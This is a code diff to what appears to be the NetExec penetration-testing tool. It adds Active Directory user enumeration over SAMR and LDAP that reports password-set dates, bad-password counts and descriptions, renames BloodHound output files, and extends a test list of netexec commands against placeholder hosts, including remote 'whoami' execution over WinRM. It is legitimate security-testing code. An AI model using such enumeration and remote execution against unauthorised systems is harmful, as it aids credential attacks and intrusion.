self.logger.debug(f"Skipping item, cannot process due to error {e}") parsed_pw_last_set = (start_date + timedelta(seconds=timestamp_seconds)).replace(microsecond=0).strftime("%Y-%m-%d %H:%M:%S")
return if parsed_pw_last_set == "1601-01-01 00:00:00":
parsed_pw_last_set = "<never>"
# we default attributes to blank strings if they don't exist in the dict
self.logger.highlight(f"{user.get('sAMAccountName', ''):<30}{parsed_pw_last_set:<20}{user.get('badPwdCount', ''):<8}{user.get('description', ''):<60}")
def groups(self): def groups(self):
# Building the search filter # Building the search filter
@ -851,7 +865,7 @@ class ldap(connection):
elif str(attribute["type"]) == "userAccountControl": elif str(attribute["type"]) == "userAccountControl":
userAccountControl = int(attribute["vals"][0]) userAccountControl = int(attribute["vals"][0])
account_disabled = userAccountControl & 2 account_disabled = userAccountControl & 2
if not account_disabled: if not account_disabled:
self.logger.highlight(f"{sAMAccountName}") self.logger.highlight(f"{sAMAccountName}")
except Exception as e: except Exception as e:
self.logger.debug(f"Skipping item, cannot process due to error {e}") self.logger.debug(f"Skipping item, cannot process due to error {e}")
@ -1373,15 +1387,18 @@ class ldap(connection):
num_workers=10, num_workers=10,
disable_pooling=False, disable_pooling=False,
timestamp=timestamp, timestamp=timestamp,
fileNamePrefix=self.output_filename.split("/")[-1],
computerfile=None, computerfile=None,
cachefile=None, cachefile=None,
exclude_dcs=False, exclude_dcs=False,
) )
self.output_filename += f"_{timestamp}"
self.logger.highlight(f"Compressing output into {self.output_filename}bloodhound.zip") self.logger.highlight(f"Compressing output into {self.output_filename}bloodhound.zip")
list_of_files = os.listdir(os.getcwd()) list_of_files = os.listdir(os.getcwd())
with ZipFile(self.output_filename + "bloodhound.zip", "w") as z: with ZipFile(self.output_filename + "bloodhound.zip", "w") as z:
for each_file in list_of_files: for each_file in list_of_files:
if each_file.startswith(timestamp) and each_file.endswith("json"): if each_file.startswith(self.output_filename.split("/")[-1]) and each_file.endswith("json"):
z.write(each_file) z.write(each_file)
os.remove(each_file) os.remove(each_file)

View File

@ -44,17 +44,7 @@ class BloodHound:
# Create an object resolver # Create an object resolver
self.ad.create_objectresolver(self.pdc) self.ad.create_objectresolver(self.pdc)
def run(self, collect, num_workers=10, disable_pooling=False, timestamp="", fileNamePrefix="", computerfile="", cachefile=None, exclude_dcs=False):
def run(
self,
collect,
num_workers=10,
disable_pooling=False,
timestamp="",
computerfile="",
cachefile=None,
exclude_dcs=False,
):
start_time = time.time() start_time = time.time()
if cachefile: if cachefile:
self.ad.load_cachefile(cachefile) self.ad.load_cachefile(cachefile)
@ -82,7 +72,7 @@ class BloodHound:
) )
# Initialize enumerator # Initialize enumerator
membership_enum = MembershipEnumerator(self.ad, self.pdc, collect, disable_pooling) membership_enum = MembershipEnumerator(self.ad, self.pdc, collect, disable_pooling)
membership_enum.enumerate_memberships(timestamp=timestamp) membership_enum.enumerate_memberships(timestamp=timestamp, fileNamePrefix=fileNamePrefix)
elif "container" in collect: elif "container" in collect:
# Fetch domains for later, computers if needed # Fetch domains for later, computers if needed
self.pdc.prefetch_info( self.pdc.prefetch_info(
@ -92,7 +82,7 @@ class BloodHound:
) )
# Initialize enumerator # Initialize enumerator
membership_enum = MembershipEnumerator(self.ad, self.pdc, collect, disable_pooling) membership_enum = MembershipEnumerator(self.ad, self.pdc, collect, disable_pooling)
membership_enum.do_container_collection(timestamp=timestamp) membership_enum.do_container_collection(timestamp=timestamp, fileNamePrefix=fileNamePrefix)
elif do_computer_enum: elif do_computer_enum:
# We need to know which computers to query regardless # We need to know which computers to query regardless
# We also need the domains to have a mapping from NETBIOS -> FQDN for local admins # We also need the domains to have a mapping from NETBIOS -> FQDN for local admins
@ -102,7 +92,7 @@ class BloodHound:
self.pdc.get_domains("acl" in collect) self.pdc.get_domains("acl" in collect)
if "trusts" in collect or "acl" in collect or "objectprops" in collect: if "trusts" in collect or "acl" in collect or "objectprops" in collect:
trusts_enum = DomainEnumerator(self.ad, self.pdc) trusts_enum = DomainEnumerator(self.ad, self.pdc)
trusts_enum.dump_domain(collect, timestamp=timestamp) trusts_enum.dump_domain(collect, timestamp=timestamp, fileNamePrefix=fileNamePrefix)
if do_computer_enum: if do_computer_enum:
# If we don't have a GC server, don't use it for deconflictation # If we don't have a GC server, don't use it for deconflictation
have_gc = len(self.ad.gcs()) > 0 have_gc = len(self.ad.gcs()) > 0
@ -114,7 +104,7 @@ class BloodHound:
computerfile=computerfile, computerfile=computerfile,
exclude_dcs=exclude_dcs, exclude_dcs=exclude_dcs,
) )
computer_enum.enumerate_computers(self.ad.computers, num_workers=num_workers, timestamp=timestamp) computer_enum.enumerate_computers(self.ad.computers, num_workers=num_workers, timestamp=timestamp, fileNamePrefix=fileNamePrefix)
end_time = time.time() end_time = time.time()
minutes, seconds = divmod(int(end_time - start_time), 60) minutes, seconds = divmod(int(end_time - start_time), 60)
self.logger.highlight("Done in %02dM %02dS" % (minutes, seconds)) self.logger.highlight("Done in %02dM %02dS" % (minutes, seconds))

View File

@ -16,7 +16,7 @@ def proto_args(parser, std_parser, module_parser):
vgroup.add_argument("--trusted-for-delegation", action="store_true", help="Get the list of users and computers with flag TRUSTED_FOR_DELEGATION") vgroup.add_argument("--trusted-for-delegation", action="store_true", help="Get the list of users and computers with flag TRUSTED_FOR_DELEGATION")
vgroup.add_argument("--password-not-required", action="store_true", help="Get the list of users with flag PASSWD_NOTREQD") vgroup.add_argument("--password-not-required", action="store_true", help="Get the list of users with flag PASSWD_NOTREQD")
vgroup.add_argument("--admin-count", action="store_true", help="Get objets that had the value adminCount=1") vgroup.add_argument("--admin-count", action="store_true", help="Get objets that had the value adminCount=1")
vgroup.add_argument("--users", action="store_true", help="Enumerate enabled domain users") vgroup.add_argument("--users", nargs="*", help="Enumerate enabled domain users")
vgroup.add_argument("--groups", action="store_true", help="Enumerate domain groups") vgroup.add_argument("--groups", action="store_true", help="Enumerate domain groups")
vgroup.add_argument("--dc-list", action="store_true", help="Enumerate Domain Controllers") vgroup.add_argument("--dc-list", action="store_true", help="Enumerate Domain Controllers")
vgroup.add_argument("--get-sid", action="store_true", help="Get domain sid") vgroup.add_argument("--get-sid", action="store_true", help="Get domain sid")

View File

@ -189,7 +189,7 @@ class mssql(connection):
raise raise
self.check_if_admin() self.check_if_admin()
self.logger.success(f"{self.domain}\\{self.username}{used_ccache} {self.mark_pwned()}") self.logger.success(f"{self.domain}\\{self.username}{used_ccache} {self.mark_pwned()}")
if not self.args.local_auth: if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config) add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs: if self.admin_privs:
add_user_bh(f"{self.hostname}$", self.domain, self.logger, self.config) add_user_bh(f"{self.hostname}$", self.domain, self.logger, self.config)
@ -222,7 +222,7 @@ class mssql(connection):
self.check_if_admin() self.check_if_admin()
out = f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}" out = f"{self.domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}"
self.logger.success(out) self.logger.success(out)
if not self.args.local_auth: if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config) add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs: if self.admin_privs:
add_user_bh(f"{self.hostname}$", self.domain, self.logger, self.config) add_user_bh(f"{self.hostname}$", self.domain, self.logger, self.config)
@ -261,7 +261,7 @@ class mssql(connection):
self.check_if_admin() self.check_if_admin()
out = f"{self.domain}\\{self.username}:{process_secret(self.nthash)} {self.mark_pwned()}" out = f"{self.domain}\\{self.username}:{process_secret(self.nthash)} {self.mark_pwned()}"
self.logger.success(out) self.logger.success(out)
if not self.args.local_auth: if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config) add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs: if self.admin_privs:
add_user_bh(f"{self.hostname}$", self.domain, self.logger, self.config) add_user_bh(f"{self.hostname}$", self.domain, self.logger, self.config)

View File

@ -243,7 +243,7 @@ class rdp(connection):
self.mark_pwned(), self.mark_pwned(),
) )
) )
if not self.args.local_auth: if not self.args.local_auth and self.username != "":
add_user_bh(username, domain, self.logger, self.config) add_user_bh(username, domain, self.logger, self.config)
if self.admin_privs: if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config) add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -289,7 +289,7 @@ class rdp(connection):
self.admin_privs = True self.admin_privs = True
self.logger.success(f"{domain}\\{username}:{process_secret(password)} {self.mark_pwned()}") self.logger.success(f"{domain}\\{username}:{process_secret(password)} {self.mark_pwned()}")
if not self.args.local_auth: if not self.args.local_auth and self.username != "":
add_user_bh(username, domain, self.logger, self.config) add_user_bh(username, domain, self.logger, self.config)
if self.admin_privs: if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config) add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -323,7 +323,7 @@ class rdp(connection):
self.admin_privs = True self.admin_privs = True
self.logger.success(f"{self.domain}\\{username}:{process_secret(ntlm_hash)} {self.mark_pwned()}") self.logger.success(f"{self.domain}\\{username}:{process_secret(ntlm_hash)} {self.mark_pwned()}")
if not self.args.local_auth: if not self.args.local_auth and self.username != "":
add_user_bh(username, domain, self.logger, self.config) add_user_bh(username, domain, self.logger, self.config)
if self.admin_privs: if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config) add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)

View File

@ -317,7 +317,7 @@ class smb(connection):
out = f"{self.domain}\\{self.username}{used_ccache} {self.mark_pwned()}" out = f"{self.domain}\\{self.username}{used_ccache} {self.mark_pwned()}"
self.logger.success(out) self.logger.success(out)
if not self.args.local_auth and not self.args.delegate: if not self.args.local_auth and self.username != "" and not self.args.delegate:
add_user_bh(self.username, domain, self.logger, self.config) add_user_bh(self.username, domain, self.logger, self.config)
if self.admin_privs: if self.admin_privs:
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config) add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
@ -380,7 +380,7 @@ class smb(connection):
out = f"{domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}" out = f"{domain}\\{self.username}:{process_secret(self.password)} {self.mark_pwned()}"
self.logger.success(out) self.logger.success(out)
if not self.args.local_auth: if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config) add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs: if self.admin_privs:
self.logger.debug(f"Adding admin user: {self.domain}/{self.username}:{self.password}@{self.host}") self.logger.debug(f"Adding admin user: {self.domain}/{self.username}:{self.password}@{self.host}")
@ -447,7 +447,7 @@ class smb(connection):
out = f"{domain}\\{self.username}:{process_secret(self.hash)} {self.mark_pwned()}" out = f"{domain}\\{self.username}:{process_secret(self.hash)} {self.mark_pwned()}"
self.logger.success(out) self.logger.success(out)
if not self.args.local_auth: if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config) add_user_bh(self.username, self.domain, self.logger, self.config)
if self.admin_privs: if self.admin_privs:
self.db.add_admin_user("hash", domain, self.username, nthash, self.host, user_id=user_id) self.db.add_admin_user("hash", domain, self.username, nthash, self.host, user_id=user_id)
@ -1008,8 +1008,10 @@ class smb(connection):
return groups return groups
def users(self): def users(self):
self.logger.display("Trying to dump local users with SAMRPC protocol") if len(self.args.users) > 0:
return UserSamrDump(self).dump() self.logger.debug(f"Dumping users: {', '.join(self.args.users)}")
return UserSamrDump(self).dump(self.args.users)
def hosts(self): def hosts(self):
hosts = [] hosts = []

View File

@ -38,7 +38,7 @@ def proto_args(parser, std_parser, module_parser):
egroup.add_argument("--disks", action="store_true", help="enumerate disks") egroup.add_argument("--disks", action="store_true", help="enumerate disks")
egroup.add_argument("--loggedon-users-filter", action="store", help="only search for specific user, works with regex") egroup.add_argument("--loggedon-users-filter", action="store", help="only search for specific user, works with regex")
egroup.add_argument("--loggedon-users", action="store_true", help="enumerate logged on users") egroup.add_argument("--loggedon-users", action="store_true", help="enumerate logged on users")
egroup.add_argument("--users", nargs="?", const="", metavar="USER", help="enumerate domain users, if a user is specified than only its information is queried.") egroup.add_argument("--users", nargs="*", metavar="USER", help="enumerate domain users, if a user is specified than only its information is queried.")
egroup.add_argument("--groups", nargs="?", const="", metavar="GROUP", help="enumerate domain groups, if a group is specified than its members are enumerated") egroup.add_argument("--groups", nargs="?", const="", metavar="GROUP", help="enumerate domain groups, if a group is specified than its members are enumerated")
egroup.add_argument("--computers", nargs="?", const="", metavar="COMPUTER", help="enumerate computer users") egroup.add_argument("--computers", nargs="?", const="", metavar="COMPUTER", help="enumerate computer users")
egroup.add_argument("--local-groups", nargs="?", const="", metavar="GROUP", help="enumerate local groups, if a group is specified then its members are enumerated") egroup.add_argument("--local-groups", nargs="?", const="", metavar="GROUP", help="enumerate local groups, if a group is specified then its members are enumerated")

View File

@ -4,6 +4,7 @@ from impacket.dcerpc.v5 import transport, samr
from impacket.dcerpc.v5.rpcrt import DCERPCException from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5.rpcrt import DCERPC_v5 from impacket.dcerpc.v5.rpcrt import DCERPC_v5
from impacket.nt_errors import STATUS_MORE_ENTRIES from impacket.nt_errors import STATUS_MORE_ENTRIES
from datetime import datetime, timedelta
class UserSamrDump: class UserSamrDump:
@ -26,6 +27,8 @@ class UserSamrDump:
self.doKerberos = connection.kerberos self.doKerberos = connection.kerberos
self.protocols = UserSamrDump.KNOWN_PROTOCOLS.keys() self.protocols = UserSamrDump.KNOWN_PROTOCOLS.keys()
self.users = [] self.users = []
self.rpc_transport = None
self.dce = None
if self.hash is not None: if self.hash is not None:
if self.hash.find(":") != -1: if self.hash.find(":") != -1:
@ -36,46 +39,37 @@ class UserSamrDump:
if self.password is None: if self.password is None:
self.password = "" self.password = ""
def dump(self): def dump(self, requested_users=None):
# Try all requested protocols until one works. # Try all requested protocols until one works.
for protocol in self.protocols: for protocol in self.protocols:
try: try:
protodef = UserSamrDump.KNOWN_PROTOCOLS[protocol] protodef = UserSamrDump.KNOWN_PROTOCOLS[protocol]
port = protodef[1] port = protodef[1]
except KeyError: except KeyError:
self.logger.debug(f"Invalid Protocol '{protocol}'") self.logger.debug(f"Invalid Protocol: {protocol}")
self.logger.debug(f"Trying protocol {protocol}") self.logger.debug(f"Trying protocol {protocol}")
rpctransport = transport.SMBTransport( self.rpc_transport = transport.SMBTransport(self.addr, port, r"\samr", self.username, self.password, self.domain, self.lmhash, self.nthash, self.aesKey, doKerberos=self.doKerberos)
self.addr,
port,
r"\samr",
self.username,
self.password,
self.domain,
self.lmhash,
self.nthash,
self.aesKey,
doKerberos=self.doKerberos,
)
try: try:
self.fetchList(rpctransport) self.fetch_users(requested_users)
break break
except Exception as e: except Exception as e:
self.logger.debug(f"Protocol failed: {e}") self.logger.debug(f"Connection with protocol {protocol} failed: {e}")
return self.users return self.users
def fetchList(self, rpctransport): def fetch_users(self, requested_users):
dce = DCERPC_v5(rpctransport) self.dce = DCERPC_v5(self.rpc_transport)
dce.connect() self.dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR) self.dce.bind(samr.MSRPC_UUID_SAMR)
# Setup Connection # Setup Connection
resp = samr.hSamrConnect2(dce) resp = samr.hSamrConnect2(self.dce)
if resp["ErrorCode"] != 0: if resp["ErrorCode"] != 0:
raise Exception("Connect error") raise Exception("Connect error")
resp2 = samr.hSamrEnumerateDomainsInSamServer( resp2 = samr.hSamrEnumerateDomainsInSamServer(
dce, self.dce,
serverHandle=resp["ServerHandle"], serverHandle=resp["ServerHandle"],
enumerationContext=0, enumerationContext=0,
preferedMaximumLength=500, preferedMaximumLength=500,
@ -84,7 +78,7 @@ class UserSamrDump:
raise Exception("Connect error") raise Exception("Connect error")
resp3 = samr.hSamrLookupDomainInSamServer( resp3 = samr.hSamrLookupDomainInSamServer(
dce, self.dce,
serverHandle=resp["ServerHandle"], serverHandle=resp["ServerHandle"],
name=resp2["Buffer"]["Buffer"][0]["Name"], name=resp2["Buffer"]["Buffer"][0]["Name"],
) )
@ -92,7 +86,7 @@ class UserSamrDump:
raise Exception("Connect error") raise Exception("Connect error")
resp4 = samr.hSamrOpenDomain( resp4 = samr.hSamrOpenDomain(
dce, self.dce,
serverHandle=resp["ServerHandle"], serverHandle=resp["ServerHandle"],
desiredAccess=samr.MAXIMUM_ALLOWED, desiredAccess=samr.MAXIMUM_ALLOWED,
domainId=resp3["DomainId"], domainId=resp3["DomainId"],
@ -101,28 +95,84 @@ class UserSamrDump:
raise Exception("Connect error") raise Exception("Connect error")
self.__domains = resp2["Buffer"]["Buffer"] self.__domains = resp2["Buffer"]["Buffer"]
domainHandle = resp4["DomainHandle"] domain_handle = resp4["DomainHandle"]
# End Setup # End Setup
status = STATUS_MORE_ENTRIES if requested_users:
enumerationContext = 0 self.logger.debug(f"Looping through users requested and looking up their information: {requested_users}")
while status == STATUS_MORE_ENTRIES:
try: try:
resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, enumerationContext=enumerationContext) names_lookup_resp = samr.hSamrLookupNamesInDomain(self.dce, domain_handle, requested_users)
rids = [r["Data"] for r in names_lookup_resp["RelativeIds"]["Element"]]
self.logger.debug(f"Specific RIDs retrieved: {rids}")
users = self.get_user_info(domain_handle, rids)
except DCERPCException as e: except DCERPCException as e:
if str(e).find("STATUS_MORE_ENTRIES") < 0: self.logger.debug(f"Exception while requesting users in domain: {e}")
self.logger.fail("Error enumerating domain user(s)") if "STATUS_SOME_NOT_MAPPED" in str(e):
break # which user is not translated correctly isn't returned so we can't tell the user which is failing, which is very annoying
resp = e.get_packet() self.logger.fail("One of the users requested does not exist in the domain, causing a critical failure during translation, re-check the users and try again")
self.logger.success("Enumerated domain user(s)") else:
for user in resp["Buffer"]["Buffer"]: self.logger.fail(f"Error occurred when looking up users in domain: {e}")
r = samr.hSamrOpenUser(dce, domainHandle, samr.MAXIMUM_ALLOWED, user["RelativeId"]) else:
info_user = samr.hSamrQueryInformationUser2(dce, r["UserHandle"], samr.USER_INFORMATION_CLASS.UserAllInformation)["Buffer"]["All"]["AdminComment"] status = STATUS_MORE_ENTRIES
self.logger.highlight(f"{self.domain}\\{user['Name']:<30} {info_user}") enumerationContext = 0
self.users.append(user["Name"]) while status == STATUS_MORE_ENTRIES:
samr.hSamrCloseHandle(dce, r["UserHandle"]) try:
enumerate_users_resp = samr.hSamrEnumerateUsersInDomain(self.dce, domain_handle, enumerationContext=enumerationContext)
except DCERPCException as e:
if str(e).find("STATUS_MORE_ENTRIES") < 0:
self.logger.fail("Error enumerating domain user(s)")
break
enumerate_users_resp = e.get_packet()
enumerationContext = resp["EnumerationContext"] rids = [r["RelativeId"] for r in enumerate_users_resp["Buffer"]["Buffer"]]
status = resp["ErrorCode"] self.logger.debug(f"Full domain RIDs retrieved: {rids}")
users = self.get_user_info(domain_handle, rids)
dce.disconnect() # set these for the while loop
enumerationContext = enumerate_users_resp["EnumerationContext"]
status = enumerate_users_resp["ErrorCode"]
self.print_user_info(users)
self.dce.disconnect()
def get_user_info(self, domain_handle, user_ids):
self.logger.debug(f"Getting user info for users: {user_ids}")
users = []
for user in user_ids:
self.logger.debug(f"Calling hSamrOpenUser for RID {user}")
open_user_resp = samr.hSamrOpenUser(
self.dce,
domain_handle,
samr.MAXIMUM_ALLOWED,
user
)
info_user_resp = samr.hSamrQueryInformationUser2(
self.dce,
open_user_resp["UserHandle"],
samr.USER_INFORMATION_CLASS.UserAllInformation
)["Buffer"]
user_info = info_user_resp["All"]
user_name = user_info["UserName"]
bad_pwd_count = user_info["BadPasswordCount"]
user_description = user_info["AdminComment"]
last_pw_set = old_large_int_to_datetime(user_info["PasswordLastSet"])
if last_pw_set == "1601-01-01 00:00:00":
last_pw_set = "<never>"
users.append({"name": user_name, "description": user_description, "bad_pwd_count": bad_pwd_count, "last_pw_set": last_pw_set})
samr.hSamrCloseHandle(self.dce, open_user_resp["UserHandle"])
return users
def print_user_info(self, users):
self.logger.highlight(f"{'-Username-':<30}{'-Last PW Set-':<20}{'-BadPW-':<8}{'-Description-':<60}")
for user in users:
self.logger.debug(f"Full user info: {user}")
self.logger.highlight(f"{user['name']:<30}{user['last_pw_set']:<20}{user['bad_pwd_count']:<8}{user['description']} ")
def old_large_int_to_datetime(large_int):
combined = (large_int["HighPart"] << 32) | large_int["LowPart"]
timestamp_seconds = combined / 10**7
start_date = datetime(1601, 1, 1)
return (start_date + timedelta(seconds=timestamp_seconds)).replace(microsecond=0).strftime("%Y-%m-%d %H:%M:%S")

View File

@ -167,7 +167,7 @@ class winrm(connection):
self.db.add_admin_user("plaintext", domain, self.username, self.password, self.host) # , user_id=user_id) self.db.add_admin_user("plaintext", domain, self.username, self.password, self.host) # , user_id=user_id)
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config) add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
if not self.args.local_auth: if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config) add_user_bh(self.username, self.domain, self.logger, self.config)
return True return True
except Exception as e: except Exception as e:
@ -210,7 +210,7 @@ class winrm(connection):
self.db.add_admin_user("hash", domain, self.username, nthash, self.host) self.db.add_admin_user("hash", domain, self.username, nthash, self.host)
add_user_bh(f"{self.hostname}$", domain, self.logger, self.config) add_user_bh(f"{self.hostname}$", domain, self.logger, self.config)
if not self.args.local_auth: if not self.args.local_auth and self.username != "":
add_user_bh(self.username, self.domain, self.logger, self.config) add_user_bh(self.username, self.domain, self.logger, self.config)
return True return True

16
poetry.lock generated
View File

@ -1826,6 +1826,20 @@ tomli = {version = ">=1.0.0", markers = "python_version < \"3.11\""}
[package.extras] [package.extras]
testing = ["argcomplete", "attrs (>=19.2.0)", "hypothesis (>=3.56)", "mock", "nose", "pygments (>=2.7.2)", "requests", "setuptools", "xmlschema"] testing = ["argcomplete", "attrs (>=19.2.0)", "hypothesis (>=3.56)", "mock", "nose", "pygments (>=2.7.2)", "requests", "setuptools", "xmlschema"]
[[package]]
name = "python-dateutil"
version = "2.9.0.post0"
description = "Extensions to the standard Python datetime module"
optional = false
python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,>=2.7"
files = [
{file = "python-dateutil-2.9.0.post0.tar.gz", hash = "sha256:37dd54208da7e1cd875388217d5e00ebd4179249f90fb72437e91a35459a0ad3"},
{file = "python_dateutil-2.9.0.post0-py2.py3-none-any.whl", hash = "sha256:a8b2bc7bffae282281c8140a97d3aa9c14da0b136dfe83f850eea9a5f7470427"},
]
[package.dependencies]
six = ">=1.5"
[[package]] [[package]]
name = "python-libnmap" name = "python-libnmap"
version = "0.7.3" version = "0.7.3"
@ -2293,4 +2307,4 @@ testing = ["big-O", "jaraco.functools", "jaraco.itertools", "more-itertools", "p
[metadata] [metadata]
lock-version = "2.0" lock-version = "2.0"
python-versions = "^3.8.0" python-versions = "^3.8.0"
content-hash = "19dfeaa2fa332997fb149a591b147061c8da77e2f69b8734d7f988562231a4e7" content-hash = "0bbd6a14b3478776b71e58b674942a5053c24fd2f802cc45ccd968f205a80167"

View File

@ -63,6 +63,7 @@ rich = "^13.3.5"
python-libnmap = "^0.7.3" python-libnmap = "^0.7.3"
oscrypto = { git = "https://github.com/Pennyw0rth/oscrypto" } # Pypi version currently broken, see: https://github.com/wbond/oscrypto/issues/78 (as of 9/23) oscrypto = { git = "https://github.com/Pennyw0rth/oscrypto" } # Pypi version currently broken, see: https://github.com/wbond/oscrypto/issues/78 (as of 9/23)
argcomplete = "^3.1.4" argcomplete = "^3.1.4"
python-dateutil = ">=2.8.2"
[tool.poetry.group.dev.dependencies] [tool.poetry.group.dev.dependencies]
flake8 = "*" flake8 = "*"

View File

@ -183,6 +183,8 @@ netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M user-de
netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M user-desc --options netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M user-desc --options
netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M whoami netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M whoami
netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M whoami --options netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M whoami --options
netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M pso
netexec ldap TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -M pso --options
##### WINRM ##### WINRM
netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS # need an extra space after this command due to regex netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS # need an extra space after this command due to regex
netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X whoami netexec winrm TARGET_HOST -u LOGIN_USERNAME -p LOGIN_PASSWORD KERBEROS -X whoami